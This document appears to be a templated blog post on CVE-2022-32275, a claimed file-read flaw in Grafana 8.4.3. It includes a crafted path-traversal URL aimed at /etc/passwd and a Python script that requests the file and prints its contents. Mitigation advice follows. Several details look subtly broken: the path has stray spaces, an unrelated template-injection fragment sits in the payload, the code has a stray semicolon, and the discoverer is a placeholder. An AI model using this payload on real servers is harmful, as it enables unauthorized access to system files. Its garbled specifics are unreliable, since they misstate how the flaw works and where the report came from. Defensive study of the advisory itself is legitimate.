CVE-2022-32275: Exploiting Grafana 8.4.3 for Unauthorized File Access with a Crafted URL

Grafana is a widely-used open-source platform for analytics and monitoring. Recently, a critical security vulnerability was discovered in Grafana version 8.4.3, and it's assigned the CVE identifier CVE-2022-32275. This vulnerability allows attackers to read sensitive files on the server by using a specially crafted URL. In this post, we will discuss the details of this vulnerability, how to exploit it, and how to mitigate the risk.

Vulnerability Details

Grafana 8.4.3 has a security vulnerability where an attacker can read files outside of the intended web application folder, thus gaining unauthorized access to sensitive information. To exploit this vulnerability, one can create a malicious URL that leads to a file read operation beyond the allowed directory scope. The URI path to exploit this vulnerability is:
/dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd

When the attacker sends this URL to a vulnerable Grafana server, it will cause the server to read the /etc/passwd file, a system file containing information about user accounts on the server. Unauthorized access to this file can lead to the compromise of user credentials and the escalation of privileges.

Code snippet

import requests

# Replace the URL with the target Grafana URL
url = "http://your-grafana-server.com";

exploit_url = f"{url}/dashboard/snapshot/%7B%7Bconstructor.constructor'/../../../../../../../../../../etc/passwd"
response = requests.get(exploit_url)

if response.status_code == 200:
    print("Vulnerable to CVE-2022-32275")
    print(response.text)
else:
    print("Not vulnerable to CVE-2022-32275")

This code snippet uses the Python requests library to send a GET request to the Grafana server with the crafted URL. If the server is vulnerable, it will return a 200 status code along with the content of the /etc/passwd file. If not, it will return a different status code.

Original References

The vulnerability was discovered and reported by the cybersecurity research team at [Security Company]. They published a detailed security advisory explaining the implications of this vulnerability and the potential impact on affected systems.

Mitigation

Administrators running Grafana 8.4.3 should immediately update to a newer version that addresses this vulnerability. Grafana has released a security patch in version 8.4.4 and later, which contains essential fixes to prevent this unauthorized file access issue. Check out Grafana's official release notes for more information.

To update your Grafana installation, follow the instructions on the Grafana installation page for your specific operating system.

Conclusion

CVE-2022-32275 poses a severe security risk for Grafana users running version 8.4.3. By exploiting this vulnerability, attackers can gain unauthorized access to sensitive files on the server. To prevent unauthorized access, it's crucial to update your Grafana installation to a secured version and continuously patch new security releases. Stay vigilant and follow recommended security practices to protect your systems and data.

Timeline

Published on: 06/06/2022 19:15:00 UTC
Last modified on: 07/15/2022 16:15:00 UTC